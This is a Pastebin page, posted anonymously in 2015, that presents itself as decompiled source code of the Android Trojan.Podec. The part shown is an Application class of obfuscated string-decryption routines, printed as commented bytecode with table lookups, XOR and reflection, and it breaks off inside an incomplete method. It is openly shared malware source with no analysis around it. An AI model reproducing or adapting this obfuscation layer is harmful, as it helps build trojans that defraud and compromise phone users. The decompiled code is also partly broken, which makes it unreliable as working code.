Advertisement
Guest User

Android Trojan.Podec source code

a guest
Jul 25th, 2015
725
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 124.50 KB | None | 0 0
  1. package com.wvydyg.zrhysbu;
  2.  
  3. import android.content.Context;
  4. import java.lang.reflect.Constructor;
  5. import java.lang.reflect.Method;
  6.  
  7. public class Application extends android.app.Application
  8. {
  9.   private static boolean dabcg;
  10.   private static Object[] e;
  11.  
  12.   // ERROR //
  13.   private static final int attachBaseContext(byte[] paramArrayOfByte, int paramInt)
  14.   {
  15.     // Byte code:
  16.     //   0: aload_0
  17.     //   1: bipush 14
  18.     //   3: baload
  19.     //   4: bipush 16
  20.     //   6: ishl
  21.     //   7: istore_2
  22.     //   8: iconst_0
  23.     //   9: istore_3
  24.     //   10: iconst_0
  25.     //   11: istore 4
  26.     //   13: iload_3
  27.     //   14: ifne +83 -> 97
  28.     //   17: iconst_3
  29.     //   18: istore_3
  30.     //   19: iload_1
  31.     //   20: sipush 255
  32.     //   23: iand
  33.     //   24: istore 8
  34.     //   26: sipush 255
  35.     //   29: aload_0
  36.     //   30: iload 8
  37.     //   32: baload
  38.     //   33: iand
  39.     //   34: sipush 255
  40.     //   37: aload_0
  41.     //   38: sipush 255
  42.     //   41: iload_1
  43.     //   42: bipush 8
  44.     //   44: ishr
  45.     //   45: iand
  46.     //   46: baload
  47.     //   47: iand
  48.     //   48: bipush 8
  49.     //   50: ishl
  50.     //   51: ior
  51.     //   52: sipush 255
  52.     //   55: aload_0
  53.     //   56: sipush 255
  54.     //   59: iload_1
  55.     //   60: bipush 16
  56.     //   62: ishr
  57.     //   63: iand
  58.     //   64: baload
  59.     //   65: iand
  60.     //   66: bipush 16
  61.     //   68: ishl
  62.     //   69: ior
  63.     //   70: istore 10
  64.     //   72: aload_0
  65.     //   73: sipush 255
  66.     //   76: iload_1
  67.     //   77: bipush 24
  68.     //   79: ishr
  69.     //   80: iand
  70.     //   81: baload
  71.     //   82: istore 11
  72.     //   84: iload 10
  73.     //   86: iload 11
  74.     //   88: bipush 24
  75.     //   90: ishl
  76.     //   91: ior
  77.     //   92: istore_2
  78.     //   93: iload_2
  79.     //   94: ireturn
  80.     //   95: astore 7
  81.     //   97: iload 4
  82.     //   99: ifne -6 -> 93
  83.     //   102: iconst_2
  84.     //   103: istore 4
  85.     //   105: iload_1
  86.     //   106: bipush 127
  87.     //   108: iand
  88.     //   109: istore 5
  89.     //   111: aload_0
  90.     //   112: iload 5
  91.     //   114: baload
  92.     //   115: istore 6
  93.     //   117: iload 6
  94.     //   119: bipush 8
  95.     //   121: ishr
  96.     //   122: istore_2
  97.     //   123: goto -30 -> 93
  98.     //   126: astore 9
  99.     //   128: goto -118 -> 10
  100.     //
  101.     // Exception table:
  102.     //   from   to  target  type
  103.     //   111    117 95  java/lang/Exception
  104.     //   26 84  126 java/lang/Exception
  105.   }
  106.  
  107.   // ERROR //
  108.   static final String attachBaseContext(String paramString)
  109.   {
  110.     // Byte code:
  111.     //   0: getstatic 21    com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  112.     //   3: ifnonnull +6 -> 9
  113.     //   6: invokestatic 24 com/wvydyg/zrhysbu/Application:doInBackground   ()V
  114.     //   9: getstatic 21    com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  115.     //   12: bipush 8
  116.     //   14: aaload
  117.     //   15: checkcast 26   java/lang/reflect/Method
  118.     //   18: getstatic 21   com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  119.     //   21: bipush 7
  120.     //   23: aaload
  121.     //   24: checkcast 26   java/lang/reflect/Method
  122.     //   27: aconst_null
  123.     //   28: aconst_null
  124.     //   29: invokevirtual 30   java/lang/reflect/Method:invoke (Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  125.     //   32: aconst_null
  126.     //   33: invokevirtual 30   java/lang/reflect/Method:invoke (Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  127.     //   36: checkcast 31   [Ljava/lang/Object;
  128.     //   39: checkcast 31   [Ljava/lang/Object;
  129.     //   42: astore_1
  130.     //   43: new 33 java/lang/StringBuilder
  131.     //   46: dup
  132.     //   47: invokespecial 34   java/lang/StringBuilder:<init>  ()V
  133.     //   50: astore_2
  134.     //   51: aload_2
  135.     //   52: getstatic 21   com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  136.     //   55: bipush 10
  137.     //   57: aaload
  138.     //   58: checkcast 26   java/lang/reflect/Method
  139.     //   61: aload_1
  140.     //   62: getstatic 21   com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  141.     //   65: bipush 12
  142.     //   67: aaload
  143.     //   68: checkcast 36   java/lang/Integer
  144.     //   71: invokevirtual 40   java/lang/Integer:intValue  ()I
  145.     //   74: aaload
  146.     //   75: aconst_null
  147.     //   76: invokevirtual 30   java/lang/reflect/Method:invoke (Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  148.     //   79: invokevirtual 44   java/lang/StringBuilder:append  (Ljava/lang/Object;)Ljava/lang/StringBuilder;
  149.     //   82: pop
  150.     //   83: aload_2
  151.     //   84: getstatic 21   com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  152.     //   87: bipush 11
  153.     //   89: aaload
  154.     //   90: checkcast 26   java/lang/reflect/Method
  155.     //   93: aload_1
  156.     //   94: getstatic 21   com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  157.     //   97: bipush 12
  158.     //   99: aaload
  159.     //   100: checkcast 36  java/lang/Integer
  160.     //   103: invokevirtual 40  java/lang/Integer:intValue  ()I
  161.     //   106: aaload
  162.     //   107: aconst_null
  163.     //   108: invokevirtual 30  java/lang/reflect/Method:invoke (Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  164.     //   111: invokevirtual 44  java/lang/StringBuilder:append  (Ljava/lang/Object;)Ljava/lang/StringBuilder;
  165.     //   114: invokevirtual 48  java/lang/StringBuilder:toString    ()Ljava/lang/String;
  166.     //   117: invokevirtual 53  java/lang/String:hashCode   ()I
  167.     //   120: istore 4
  168.     //   122: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  169.     //   125: bipush 6
  170.     //   127: aaload
  171.     //   128: checkcast 55  [I
  172.     //   131: checkcast 55  [I
  173.     //   134: astore 5
  174.     //   136: iload 4
  175.     //   138: aload 5
  176.     //   140: iconst_0
  177.     //   141: iaload
  178.     //   142: ixor
  179.     //   143: istore 6
  180.     //   145: iload 4
  181.     //   147: aload 5
  182.     //   149: iconst_1
  183.     //   150: iaload
  184.     //   151: ixor
  185.     //   152: istore 7
  186.     //   154: iload 4
  187.     //   156: aload 5
  188.     //   158: iconst_2
  189.     //   159: iaload
  190.     //   160: ixor
  191.     //   161: istore 8
  192.     //   163: iload 4
  193.     //   165: aload 5
  194.     //   167: iconst_3
  195.     //   168: iaload
  196.     //   169: ixor
  197.     //   170: istore 9
  198.     //   172: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  199.     //   175: iconst_5
  200.     //   176: aaload
  201.     //   177: checkcast 55  [I
  202.     //   180: checkcast 55  [I
  203.     //   183: astore 10
  204.     //   185: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  205.     //   188: iconst_1
  206.     //   189: aaload
  207.     //   190: checkcast 55  [I
  208.     //   193: checkcast 55  [I
  209.     //   196: astore 11
  210.     //   198: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  211.     //   201: iconst_2
  212.     //   202: aaload
  213.     //   203: checkcast 55  [I
  214.     //   206: checkcast 55  [I
  215.     //   209: astore 12
  216.     //   211: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  217.     //   214: iconst_3
  218.     //   215: aaload
  219.     //   216: checkcast 55  [I
  220.     //   219: checkcast 55  [I
  221.     //   222: astore 13
  222.     //   224: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  223.     //   227: iconst_4
  224.     //   228: aaload
  225.     //   229: checkcast 55  [I
  226.     //   232: checkcast 55  [I
  227.     //   235: astore 14
  228.     //   237: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  229.     //   240: iconst_0
  230.     //   241: aaload
  231.     //   242: checkcast 57  [B
  232.     //   245: checkcast 57  [B
  233.     //   248: astore 15
  234.     //   250: getstatic 21  com/wvydyg/zrhysbu/Application:e    [Ljava/lang/Object;
  235.     //   253: bipush 9
  236.     //   255: aaload
  237.     //   256: checkcast 26  java/lang/reflect/Method
  238.     //   259: aload_0
  239.     //   260: aconst_null
  240.     //   261: invokevirtual 30  java/lang/reflect/Method:invoke (Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  241.     //   264: checkcast 59  [C
  242.     //   267: checkcast 59  [C
  243.     //   270: astore 16
  244.     //   272: iload 8
  245.     //   274: istore 17
  246.     //   276: iload 7
  247.     //   278: istore 18
  248.     //   280: iload 6
  249.     //   282: istore 19
  250.     //   284: iload 9
  251.     //   286: istore 20
  252.     //   288: iconst_0
  253.     //   289: istore 21
  254.     //   291: iload 21
  255.     //   293: ifne +1255 -> 1548
  256.     //   296: aload 16
  257.     //   298: arraylength
  258.     //   299: istore 23
  259.     //   301: iconst_0
  260.     //   302: istore 24
  261.     //   304: iload 24
  262.     //   306: iload 23
  263.     //   308: if_icmpge +1240 -> 1548
  264.     //   311: iload 24
  265.     //   313: bipush 8
  266.     //   315: irem
  267.     //   316: ifne +1020 -> 1336
  268.     //   319: iload 19
  269.     //   321: aload 10
  270.     //   323: iconst_0
  271.     //   324: iaload
  272.     //   325: ixor
  273.     //   326: istore 27
  274.     //   328: iload 18
  275.     //   330: aload 10
  276.     //   332: iconst_1
  277.     //   333: iaload
  278.     //   334: ixor
  279.     //   335: istore 28
  280.     //   337: iload 17
  281.     //   339: aload 10
  282.     //   341: iconst_2
  283.     //   342: iaload
  284.     //   343: ixor
  285.     //   344: istore 29
  286.     //   346: iload 20
  287.     //   348: aload 10
  288.     //   350: iconst_3
  289.     //   351: iaload
  290.     //   352: ixor
  291.     //   353: istore 30
  292.     //   355: iconst_4
  293.     //   356: istore 31
  294.     //   358: iload 31
  295.     //   360: bipush 36
  296.     //   362: if_icmpge +446 -> 808
  297.     //   365: aload 11
  298.     //   367: sipush 255
  299.     //   370: iload 27
  300.     //   372: iand
  301.     //   373: iaload
  302.     //   374: aload 12
  303.     //   376: sipush 255
  304.     //   379: iload 28
  305.     //   381: bipush 8
  306.     //   383: ishr
  307.     //   384: iand
  308.     //   385: iaload
  309.     //   386: ixor
  310.     //   387: aload 13
  311.     //   389: sipush 255
  312.     //   392: iload 29
  313.     //   394: bipush 16
  314.     //   396: ishr
  315.     //   397: iand
  316.     //   398: iaload
  317.     //   399: ixor
  318.     //   400: aload 14
  319.     //   402: iload 30
  320.     //   404: bipush 24
  321.     //   406: iushr
  322.     //   407: iaload
  323.     //   408: ixor
  324.     //   409: aload 10
  325.     //   411: iload 31
  326.     //   413: iaload
  327.     //   414: ixor
  328.     //   415: istore 39
  329.     //   417: aload 11
  330.     //   419: iload 28
  331.     //   421: sipush 255
  332.     //   424: iand
  333.     //   425: iaload
  334.     //   426: aload 12
  335.     //   428: sipush 255
  336.     //   431: iload 29
  337.     //   433: bipush 8
  338.     //   435: ishr
  339.     //   436: iand
  340.     //   437: iaload
  341.     //   438: ixor
  342.     //   439: aload 13
  343.     //   441: sipush 255
  344.     //   444: iload 30
  345.     //   446: bipush 16
  346.     //   448: ishr
  347.     //   449: iand
  348.     //   450: iaload
  349.     //   451: ixor
  350.     //   452: aload 14
  351.     //   454: iload 27
  352.     //   456: bipush 24
  353.     //   458: iushr
  354.     //   459: iaload
  355.     //   460: ixor
  356.     //   461: aload 10
  357.     //   463: iload 31
  358.     //   465: iconst_1
  359.     //   466: iadd
  360.     //   467: iaload
  361.     //   468: ixor
  362.     //   469: istore 40
  363.     //   471: aload 11
  364.     //   473: iload 29
  365.     //   475: sipush 255
  366.     //   478: iand
  367.     //   479: iaload
  368.     //   480: aload 12
  369.     //   482: sipush 255
  370.     //   485: iload 30
  371.     //   487: bipush 8
  372.     //   489: ishr
  373.     //   490: iand
  374.     //   491: iaload
  375.     //   492: ixor
  376.     //   493: aload 13
  377.     //   495: sipush 255
  378.     //   498: iload 27
  379.     //   500: bipush 16
  380.     //   502: ishr
  381.     //   503: iand
  382.     //   504: iaload
  383.     //   505: ixor
  384.     //   506: aload 14
  385.     //   508: iload 28
  386.     //   510: bipush 24
  387.     //   512: iushr
  388.     //   513: iaload
  389.     //   514: ixor
  390.     //   515: aload 10
  391.     //   517: iload 31
  392.     //   519: iconst_2
  393.     //   520: iadd
  394.     //   521: iaload
  395.     //   522: ixor
  396.     //   523: istore 41
  397.     //   525: aload 11
  398.     //   527: iload 30
  399.     //   529: sipush 255
  400.     //   532: iand
  401.     //   533: iaload
  402.     //   534: aload 12
  403.     //   536: sipush 255
  404.     //   539: iload 27
  405.     //   541: bipush 8
  406.     //   543: ishr
  407.     //   544: iand
  408.     //   545: iaload
  409.     //   546: ixor
  410.     //   547: aload 13
  411.     //   549: sipush 255
  412.     //   552: iload 28
  413.     //   554: bipush 16
  414.     //   556: ishr
  415.     //   557: iand
  416.     //   558: iaload
  417.     //   559: ixor
  418.     //   560: aload 14
  419.     //   562: iload 29
  420.     //   564: bipush 24
  421.     //   566: iushr
  422.     //   567: iaload
  423.     //   568: ixor
  424.     //   569: aload 10
  425.     //   571: iload 31
  426.     //   573: iconst_3
  427.     //   574: iadd
  428.     //   575: iaload
  429.     //   576: ixor
  430.     //   577: istore 42
  431.     //   579: iload 31
  432.     //   581: iconst_4
  433.     //   582: iadd
  434.     //   583: istore 43
  435.     //   585: aload 11
  436.     //   587: iload 39
  437.     //   589: sipush 255
  438.     //   592: iand
  439.     //   593: iaload
  440.     //   594: aload 12
  441.     //   596: sipush 255
  442.     //   599: iload 40
  443.     //   601: bipush 8
  444.     //   603: ishr
  445.     //   604: iand
  446.     //   605: iaload
  447.     //   606: ixor
  448.     //   607: aload 13
  449.     //   609: sipush 255
  450.     //   612: iload 41
  451.     //   614: bipush 16
  452.     //   616: ishr
  453.     //   617: iand
  454.     //   618: iaload
  455.     //   619: ixor
  456.     //   620: aload 14
  457.     //   622: iload 42
  458.     //   624: bipush 24
  459.     //   626: iushr
  460.     //   627: iaload
  461.     //   628: ixor
  462.     //   629: aload 10
  463.     //   631: iload 43
  464.     //   633: iaload
  465.     //   634: ixor
  466.     //   635: istore 27
  467.     //   637: aload 11
  468.     //   639: iload 40
  469.     //   641: sipush 255
  470.     //   644: iand
  471.     //   645: iaload
  472.     //   646: aload 12
  473.     //   648: sipush 255
  474.     //   651: iload 41
  475.     //   653: bipush 8
  476.     //   655: ishr
  477.     //   656: iand
  478.     //   657: iaload
  479.     //   658: ixor
  480.     //   659: aload 13
  481.     //   661: sipush 255
  482.     //   664: iload 42
  483.     //   666: bipush 16
  484.     //   668: ishr
  485.     //   669: iand
  486.     //   670: iaload
  487.     //   671: ixor
  488.     //   672: aload 14
  489.     //   674: iload 39
  490.     //   676: bipush 24
  491.     //   678: iushr
  492.     //   679: iaload
  493.     //   680: ixor
  494.     //   681: aload 10
  495.     //   683: iload 43
  496.     //   685: iconst_1
  497.     //   686: iadd
  498.     //   687: iaload
  499.     //   688: ixor
  500.     //   689: istore 28
  501.     //   691: aload 11
  502.     //   693: iload 41
  503.     //   695: sipush 255
  504.     //   698: iand
  505.     //   699: iaload
  506.     //   700: aload 12
  507.     //   702: sipush 255
  508.     //   705: iload 42
  509.     //   707: bipush 8
  510.     //   709: ishr
  511.     //   710: iand
  512.     //   711: iaload
  513.     //   712: ixor
  514.     //   713: aload 13
  515.     //   715: sipush 255
  516.     //   718: iload 39
  517.     //   720: bipush 16
  518.     //   722: ishr
  519.     //   723: iand
  520.     //   724: iaload
  521.     //   725: ixor
  522.     //   726: aload 14
  523.     //   728: iload 40
  524.     //   730: bipush 24
  525.     //   732: iushr
  526.     //   733: iaload
  527.     //   734: ixor
  528.     //   735: aload 10
  529.     //   737: iload 43
  530.     //   739: iconst_2
  531.     //   740: iadd
  532.     //   741: iaload
  533.     //   742: ixor
  534.     //   743: istore 29
  535.     //   745: aload 11
  536.     //   747: iload 42
  537.     //   749: sipush 255
  538.     //   752: iand
  539.     //   753: iaload
  540.     //   754: aload 12
  541.     //   756: sipush 255
  542.     //   759: iload 39
  543.     //   761: bipush 8
  544.     //   763: ishr
  545.     //   764: iand
  546.     //   765: iaload
  547.     //   766: ixor
  548.     //   767: aload 13
  549.     //   769: sipush 255
  550.     //   772: iload 40
  551.     //   774: bipush 16
  552.     //   776: ishr
  553.     //   777: iand
  554.     //   778: iaload
  555.     //   779: ixor
  556.     //   780: aload 14
  557.     //   782: iload 41
  558.     //   784: bipush 24
  559.     //   786: iushr
  560.     //   787: iaload
  561.     //   788: ixor
  562.     //   789: aload 10
  563.     //   791: iload 43
  564.     //   793: iconst_3
  565.     //   794: iadd
  566.     //   795: iaload
  567.     //   796: ixor
  568.     //   797: istore 30
  569.     //   799: iload 43
  570.     //   801: iconst_4
  571.     //   802: iadd
  572.     //   803: istore 31
  573.     //   805: goto -447 -> 358
  574.     //   808: aload 11
  575.     //   810: sipush 255
  576.     //   813: iload 27
  577.     //   815: iand
  578.     //   816: iaload
  579.     //   817: aload 12
  580.     //   819: sipush 255
  581.     //   822: iload 28
  582.     //   824: bipush 8
  583.     //   826: ishr
  584.     //   827: iand
  585.     //   828: iaload
  586.     //   829: ixor
  587.     //   830: aload 13
  588.     //   832: sipush 255
  589.     //   835: iload 29
  590.     //   837: bipush 16
  591.     //   839: ishr
  592.     //   840: iand
  593.     //   841: iaload
  594.     //   842: ixor
  595.     //   843: aload 14
  596.     //   845: iload 30
  597.     //   847: bipush 24
  598.     //   849: iushr
  599.     //   850: iaload
  600.     //   851: ixor
  601.     //   852: aload 10
  602.     //   854: iload 31
  603.     //   856: iaload
  604.     //   857: ixor
  605.     //   858: istore 32
  606.     //   860: aload 11
  607.     //   862: iload 28
  608.     //   864: sipush 255
  609.     //   867: iand
  610.     //   868: iaload
  611.     //   869: aload 12
  612.     //   871: sipush 255
  613.     //   874: iload 29
  614.     //   876: bipush 8
  615.     //   878: ishr
  616.     //   879: iand
  617.     //   880: iaload
  618.     //   881: ixor
  619.     //   882: aload 13
  620.     //   884: sipush 255
  621.     //   887: iload 30
  622.     //   889: bipush 16
  623.     //   891: ishr
  624.     //   892: iand
  625.     //   893: iaload
  626.     //   894: ixor
  627.     //   895: aload 14
  628.     //   897: iload 27
  629.     //   899: bipush 24
  630.     //   901: iushr
  631.     //   902: iaload
  632.     //   903: ixor
  633.     //   904: aload 10
  634.     //   906: iload 31
  635.     //   908: iconst_1
  636.     //   909: iadd
  637.     //   910: iaload
  638.     //   911: ixor
  639.     //   912: istore 33
  640.     //   914: aload 11
  641.     //   916: iload 29
  642.     //   918: sipush 255
  643.     //   921: iand
  644.     //   922: iaload
  645.     //   923: aload 12
  646.     //   925: sipush 255
  647.     //   928: iload 30
  648.     //   930: bipush 8
  649.     //   932: ishr
  650.     //   933: iand
  651.     //   934: iaload
  652.     //   935: ixor
  653.     //   936: aload 13
  654.     //   938: sipush 255
  655.     //   941: iload 27
  656.     //   943: bipush 16
  657.     //   945: ishr
  658.     //   946: iand
  659.     //   947: iaload
  660.     //   948: ixor
  661.     //   949: aload 14
  662.     //   951: iload 28
  663.     //   953: bipush 24
  664.     //   955: iushr
  665.     //   956: iaload
  666.     //   957: ixor
  667.     //   958: aload 10
  668.     //   960: iload 31
  669.     //   962: iconst_2
  670.     //   963: iadd
  671.     //   964: iaload
  672.     //   965: ixor
  673.     //   966: istore 34
  674.     //   968: aload 11
  675.     //   970: iload 30
  676.     //   972: sipush 255
  677.     //   975: iand
  678.     //   976: iaload
  679.     //   977: aload 12
  680.     //   979: sipush 255
  681.     //   982: iload 27
  682.     //   984: bipush 8
  683.     //   986: ishr
  684.     //   987: iand
  685.     //   988: iaload
  686.     //   989: ixor
  687.     //   990: aload 13
  688.     //   992: sipush 255
  689.     //   995: iload 28
  690.     //   997: bipush 16
  691.     //   999: ishr
  692.     //   1000: iand
  693.     //   1001: iaload
  694.     //   1002: ixor
  695.     //   1003: aload 14
  696.     //   1005: iload 29
  697.     //   1007: bipush 24
  698.     //   1009: iushr
  699.     //   1010: iaload
  700.     //   1011: ixor
  701.     //   1012: aload 10
  702.     //   1014: iload 31
  703.     //   1016: iconst_3
  704.     //   1017: iadd
  705.     //   1018: iaload
  706.     //   1019: ixor
  707.     //   1020: istore 35
  708.     //   1022: iload 31
  709.     //   1024: iconst_4
  710.     //   1025: iadd
  711.     //   1026: istore 36
  712.     //   1028: sipush 255
  713.     //   1031: aload 15
  714.     //   1033: iload 32
  715.     //   1035: sipush 255
  716.     //   1038: iand
  717.     //   1039: baload
  718.     //   1040: iand
  719.     //   1041: sipush 255
  720.     //   1044: aload 15
  721.     //   1046: sipush 255
  722.     //   1049: iload 33
  723.     //   1051: bipush 8
  724.     //   1053: ishr
  725.     //   1054: iand
  726.     //   1055: baload
  727.     //   1056: iand
  728.     //   1057: bipush 8
  729.     //   1059: ishl
  730.     //   1060: ixor
  731.     //   1061: sipush 255
  732.     //   1064: aload 15
  733.     //   1066: sipush 255
  734.     //   1069: iload 34
  735.     //   1071: bipush 16
  736.     //   1073: ishr
  737.     //   1074: iand
  738.     //   1075: baload
  739.     //   1076: iand
  740.     //   1077: bipush 16
  741.     //   1079: ishl
  742.     //   1080: ixor
  743.     //   1081: aload 15
  744.     //   1083: iload 35
  745.     //   1085: bipush 24
  746.     //   1087: iushr
  747.     //   1088: baload
  748.     //   1089: bipush 24
  749.     //   1091: ishl
  750.     //   1092: ixor
  751.     //   1093: aload 10
  752.     //   1095: iload 36
  753.     //   1097: iconst_0
  754.     //   1098: iadd
  755.     //   1099: iaload
  756.     //   1100: ixor
  757.     //   1101: istore 19
  758.     //   1103: sipush 255
  759.     //   1106: aload 15
  760.     //   1108: iload 33
  761.     //   1110: sipush 255
  762.     //   1113: iand
  763.     //   1114: baload
  764.     //   1115: iand
  765.     //   1116: sipush 255
  766.     //   1119: aload 15
  767.     //   1121: sipush 255
  768.     //   1124: iload 34
  769.     //   1126: bipush 8
  770.     //   1128: ishr
  771.     //   1129: iand
  772.     //   1130: baload
  773.     //   1131: iand
  774.     //   1132: bipush 8
  775.     //   1134: ishl
  776.     //   1135: ixor
  777.     //   1136: sipush 255
  778.     //   1139: aload 15
  779.     //   1141: sipush 255
  780.     //   1144: iload 35
  781.     //   1146: bipush 16
  782.     //   1148: ishr
  783.     //   1149: iand
  784.     //   1150: baload
  785.     //   1151: iand
  786.     //   1152: bipush 16
  787.     //   1154: ishl
  788.     //   1155: ixor
  789.     //   1156: aload 15
  790.     //   1158: iload 32
  791.     //   1160: bipush 24
  792.     //   1162: iushr
  793.     //   1163: baload
  794.     //   1164: bipush 24
  795.     //   1166: ishl
  796.     //   1167: ixor
  797.     //   1168: aload 10
  798.     //   1170: iload 36
  799.     //   1172: iconst_1
  800.     //   1173: iadd
  801.     //   1174: iaload
  802.     //   1175: ixor
  803.     //   1176: istore 18
  804.     //   1178: sipush 255
  805.     //   1181: aload 15
  806.     //   1183: iload 34
  807.     //   1185: sipush 255
  808.     //   1188: iand
  809.     //   1189: baload
  810.     //   1190: iand
  811.     //   1191: sipush 255
  812.     //   1194: aload 15
  813.     //   1196: sipush 255
  814.     //   1199: iload 35
  815.     //   1201: bipush 8
  816.     //   1203: ishr
  817.     //   1204: iand
  818.     //   1205: baload
  819.     //   1206: iand
  820.     //   1207: bipush 8
  821.     //   1209: ishl
  822.     //   1210: ixor
  823.     //   1211: sipush 255
  824.     //   1214: aload 15
  825.     //   1216: sipush 255
  826.     //   1219: iload 32
  827.     //   1221: bipush 16
  828.     //   1223: ishr
  829.     //   1224: iand
  830.     //   1225: baload
  831.     //   1226: iand
  832.     //   1227: bipush 16
  833.     //   1229: ishl
  834.     //   1230: ixor
  835.     //   1231: aload 15
  836.     //   1233: iload 33
  837.     //   1235: bipush 24
  838.     //   1237: iushr
  839.     //   1238: baload
  840.     //   1239: bipush 24
  841.     //   1241: ishl
  842.     //   1242: ixor
  843.     //   1243: aload 10
  844.     //   1245: iload 36
  845.     //   1247: iconst_2
  846.     //   1248: iadd
  847.     //   1249: iaload
  848.     //   1250: ixor
  849.     //   1251: istore 17
  850.     //   1253: sipush 255
  851.     //   1256: aload 15
  852.     //   1258: iload 35
  853.     //   1260: sipush 255
  854.     //   1263: iand
  855.     //   1264: baload
  856.     //   1265: iand
  857.     //   1266: sipush 255
  858.     //   1269: aload 15
  859.     //   1271: sipush 255
  860.     //   1274: iload 32
  861.     //   1276: bipush 8
  862.     //   1278: ishr
  863.     //   1279: iand
  864.     //   1280: baload
  865.     //   1281: iand
  866.     //   1282: bipush 8
  867.     //   1284: ishl
  868.     //   1285: ixor
  869.     //   1286: sipush 255
  870.     //   1289: aload 15
  871.     //   1291: sipush 255
  872.     //   1294: iload 33
  873.     //   1296: bipush 16
  874.     //   1298: ishr
  875.     //   1299: iand
  876.     //   1300: baload
  877.     //   1301: iand
  878.     //   1302: bipush 16
  879.     //   1304: ishl
  880.     //   1305: ixor
  881.     //   1306: aload 15
  882.     //   1308: iload 34
  883.     //   1310: bipush 24
  884.     //   1312: iushr
  885.     //   1313: baload
  886.     //   1314: bipush 24
  887.     //   1316: ishl
  888.     //   1317: ixor
  889.     //   1318: istore 37
  890.     //   1320: aload 10
  891.     //   1322: iload 36
  892.     //   1324: iconst_3
  893.     //   1325: iadd
  894.     //   1326: iaload
  895.     //   1327: istore 38
  896.     //   1329: iload 38
  897.     //   1331: iload 37
  898.     //   1333: ixor
  899.     //   1334: istore 20
  900.     //   1336: iconst_0
  901.     //   1337: istore 25
  902.     //   1339: iload 25
  903.     //   1341: ifne +225 -> 1566
  904.     //   1344: iconst_3
  905.     //   1345: istore 25
  906.     //   1347: iload 24
  907.     //   1349: bipush 8
  908.     //   1351: irem
  909.     //   1352: tableswitch  default:+214 -> 1566, 0:+48->1400, 1:+68->1420, 2:+85->1437, 3:+105->1457, 4:+122->1474, 5:+142->1494, 6:+159->1511, 7:+179->1531
  910.     //   1401: bipush 21
  911.     //   1403: dload 21
  912.     //   1405: ldc_w 4112
  913.     //   1408: ishr
  914.     //   1409: aload 16
  915.     //   1411: iload 24
  916.     //   1413: caload
  917.     //   1414: ixor
  918.     //   1415: i2c
  919.     //   1416: castore
  920.     //   1417: goto +149 -> 1566
  921.     //   1420: aload 16
  922.     //   1422: iload 24
  923.     //   1424: iload 19
  924.     //   1426: aload 16
  925.     //   1428: iload 24
  926.     //   1430: caload
  927.     //   1431: ixor
  928.     //   1432: i2c
  929.     //   1433: castore
  930.     //   1434: goto +132 -> 1566
  931.     //   1437: aload 16
  932.     //   1439: iload 24
  933.     //   1441: iload 18
  934.     //   1443: bipush 16
  935.     //   1445: ishr
  936.     //   1446: aload 16
  937.     //   1448: iload 24
  938.     //   1450: caload
  939.     //   1451: ixor
  940.     //   1452: i2c
  941.     //   1453: castore
  942.     //   1454: goto +112 -> 1566
  943.     //   1457: aload 16
  944.     //   1459: iload 24
  945.     //   1461: iload 18
  946.     //   1463: aload 16
  947.     //   1465: iload 24
  948.     //   1467: caload
  949.     //   1468: ixor
  950.     //   1469: i2c
  951.     //   1470: castore
  952.     //   1471: goto +95 -> 1566
  953.     //   1474: aload 16
  954.     //   1476: iload 24
  955.     //   1478: iload 17
  956.     //   1480: bipush 16
  957.     //   1482: ishr
  958.     //   1483: aload 16
  959.     //   1485: iload 24
  960.     //   1487: caload
  961.     //   1488: ixor
  962.     //   1489: i2c
  963.     //   1490: castore
  964.     //   1491: goto +75 -> 1566
  965.     //   1494: aload 16
  966.     //   1496: iload 24
  967.     //   1498: iload 17
  968.     //   1500: aload 16
  969.     //   1502: iload 24
  970.     //   1504: caload
  971.     //   1505: ixor
  972.     //   1506: i2c
  973.     //   1507: castore
  974.     //   1508: goto +58 -> 1566
  975.     //   1511: aload 16
  976.     //   1513: iload 24
  977.     //   1515: iload 20
  978.     //   1517: bipush 16
  979.     //   1519: ishr
  980.     //   1520: aload 16
  981.     //   1522: iload 24
  982.     //   1524: caload
  983.     //   1525: ixor
  984.     //   1526: i2c
  985.     //   1527: castore
  986.     //   1528: goto +38 -> 1566
  987.     //   1531: aload 16
  988.     //   1533: iload 24
  989.     //   1535: iload 20
  990.     //   1537: aload 16
  991.     //   1539: iload 24
  992.     //   1541: caload
  993.     //   1542: ixor
  994.     //   1543: i2c
  995.     //   1544: castore
  996.     //   1545: goto +21 -> 1566
  997.     //   1548: new 50   java/lang/String
  998.     //   1551: dup
  999.     //   1552: aload 16
  1000.     //   1554: invokespecial 62 java/lang/String:<init> ([C)V
  1001.     //   1557: areturn
  1002.     //   1558: astore 22
  1003.     //   1560: iconst_1
  1004.     //   1561: istore 21
  1005.     //   1563: goto -1272 -> 291
  1006.     //   1566: iinc 24 1
  1007.     //   1569: goto -1265 -> 304
  1008.     //   1572: astore 26
  1009.     //   1574: goto -235 -> 1339
  1010.     //
  1011.     // Exception table:
  1012.     //   from   to  target  type
  1013.     //   296    1329    1558    java/lang/Throwable
  1014.     //   1347   1545    1572    java/lang/Throwable
  1015.   }
  1016.  
  1017.   private void dcff()
  1018.   {
  1019.     if (dabcg);
  1020.     while (true)
  1021.     {
  1022.      
  1023.       while (j < arrayOfChar.length)
  1024.       {
  1025.         int i33 = arrayOfChar[j];
  1026.         int i34 = k + 1;
